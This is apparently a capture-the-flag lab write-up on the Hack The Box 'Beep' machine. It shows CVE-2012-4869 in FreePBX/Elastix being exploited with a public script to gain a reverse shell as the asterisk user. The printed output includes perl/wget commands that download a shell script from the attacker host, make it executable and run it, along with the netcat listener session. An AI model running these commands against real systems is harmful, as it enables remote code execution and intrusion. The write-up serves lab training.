InfoSec LAB

Beep_CVE-2012-4869

Created: 3 min read

Confirmed version enumeration of the FreePBX instance has given me an opportunity to find more potential vulnerabilities that would provide an initial foothold. I came across CVE-2012-4869

CVE-2012-4869

This vulnerability allows an attacker to include arbitrary files on the affected system, including sensitive files such as the /etc/amportal.conf file, by sending a specially crafted HTTP request to the vulnerable script, with a parameter that contains the path to the file that the attacker wants to include. The path can include “../” sequences to navigate to parent directories, which allows an attacker to include any file on the file system that the web server process has permissions to access.

Exploiting this vulnerability allows an attacker to view the contents of sensitive files, such as the amportal.conf file, which could contain credentials and other sensitive information that could be used to compromise the system. Additionally, an attacker could use this vulnerability to include and execute arbitrary scripts, which could lead to complete compromise of the affected system.

Exploit

Found the exploit online

Execution

┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ python2 cve-2012-4869.py 'https://10.10.10.7' 10.10.14.5 4444 1
[+] LHOST = 10.10.14.5
[+] LPORT = 4444
[+] Build payload
[+] Shell listen
traceback (most recent call last):
  File "elastix.py", line 288, in <module>
    s = Shell((LHOST, int(LPORT)), bind=True)
  File "elastix.py", line 109, in __init__
    self.sock.bind(self.addr)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
[+] HTTP Listen = 8888
    return getattr(self._sock,name)(*args)
socket.error: [Errno 98] Address already in use
[+] command: perl -MIO -e 'system("wget -P /tmp http://10.10.14.7:8888/exploit.sh");'
[+] command: perl -MIO -e 'system("chmod +x /tmp/exploit.sh");'
[+] command: perl -MIO -e 'system("/tmp/exploit.sh");'

Executed the exploit.

I was a bit worried that python threw an error regarding the address already being in use as I was running the Netcat listener on the same port because I initially thought that the exploit itself wouldn’t provide the listener.

Nevertheless, the exploit went ahead and continue the program

┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.7] 58017
whoami
asterisk
hostname
beep
ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:B9:A3:13  
          inet addr:10.10.10.7  Bcast:10.10.10.255  Mask:255.255.255.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:3702241 errors:0 dropped:0 overruns:0 frame:0
          tx packets:2360768 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:442710719 (422.2 MiB)  TX bytes:728971753 (695.2 MiB)
          interrupt:59 Base address:0x2024 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:16436  Metric:1
          rx packets:14993 errors:0 dropped:0 overruns:0 frame:0
          tx packets:14993 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:1555181 (1.4 MiB)  TX bytes:1555181 (1.4 MiB)

Initial Foothold established as asterisk via exploiting CVE-2012-4869 on the target web application

Interactive Graph View

Backlinks